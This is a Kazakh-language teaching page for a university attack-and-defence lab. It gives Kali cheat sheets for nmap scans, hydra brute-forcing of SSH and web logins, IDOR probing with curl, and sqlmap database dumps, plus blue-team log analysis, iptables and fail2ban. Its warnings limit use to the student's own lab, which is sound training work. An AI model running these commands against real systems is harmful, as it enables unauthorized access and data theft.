OWASP — веб қауіпсіздік стандарты

Тегін интерактивті жаттығулар (университет ережесіне сәйкес — тек легалды платформалар)

Құжаттамалар және стандарттар

Cheat sheet-тер (Kali командалары)

nmap — желі сканерлеу
ip a                      # өз Kali IP-ңді көр
nmap -sn 172.16.X.0/24    # ping sweep: тірі хосттар
nmap -sV -sC <target>     # барлық порттар + сервистер + скрип्टтер
nmap -sS -p- <target>     # SYN scan, барлық 65535 порт
nmap -A <target>          # OS анықтау + скрип्टтер + traceroute
# Нәтижені сақта:  nmap -sV -oN scan.txt <target>
hydra — brute force (тек өз зертханаңда!)
# SSH-ге (мысал: target-те ssh:22 бар):
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> ssh
# Web-формаға:
hydra -l admin -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
# Нәтиже: «PASSWORD : admin, Target2026!» тәрізді жол
curl — web зерттеу
curl -s http://<target>:8080/api/orders/101        # өз order
curl -s http://<target>:8080/api/orders/1          # бәсекесіз IDOR тексеруі
curl -s http://<target>:8080/ -v                   # headers
curl -s -X POST http://<target>:8080/api/login -H "Content-Type: application/json" -d '{"user":"alice","pass":"a1ce"}'
# token-бен:
TOKEN=$(curl -s .../api/login -d ... | jq -r .token)
curl -s http://<target>:8080/api/orders -H "Authorization: Bearer $TOKEN"
sqlmap — SQL инъекциясы
# Осал параметрді тапқан соң:
sqlmap -u "http://<target>:8080/api/items?id=1" --dbs
sqlmap -u "http://<target>:8080/api/items?id=1" -D shop -tables
sqlmap -u "http://<target>:8080/api/items?id=1" -D shop -T users --dump
# Өз зертханаңнан тыс URL-ге sqlmap жүргізугЕ БОЛМАЙДЫ.
Blue: логтарды талдау (grep/awk)
tail -f /var/log/shop/access.log
# Барлық IP-лерді санау (кім көп сұраныс жолды?):
awk '{print $4}' /var/log/shop/access.log | sort | uniq -c | sort -rn | head
# Belгілі IP-нің істегені:
grep "ip=172.16.X.101" /var/log/shop/access.log
# 401/403 қателері (brute force/IDOR ізді):
awk '$6 ~ /401|403/' /var/log/shop/access.log | tail -20
Blue: қорғаныс (fix + iptables + fail2ban)
# 1) IDOR түзетуі (fixer ретінде):
echo "access_check=on" | sudo tee /etc/shop/access_check.conf
# 2) Шыбуылшы IP-ні блоктау:
sudo iptables -A INPUT -s 172.16.X.101 -j DROP
sudo iptables -L INPUT -n --line-numbers
# 3) fail2ban: ssh-ге brute force болса автоматты ban
sudo fail2ban-client status sshd
# Тексеру: блокталған IP-ден curl → timeout болуы керек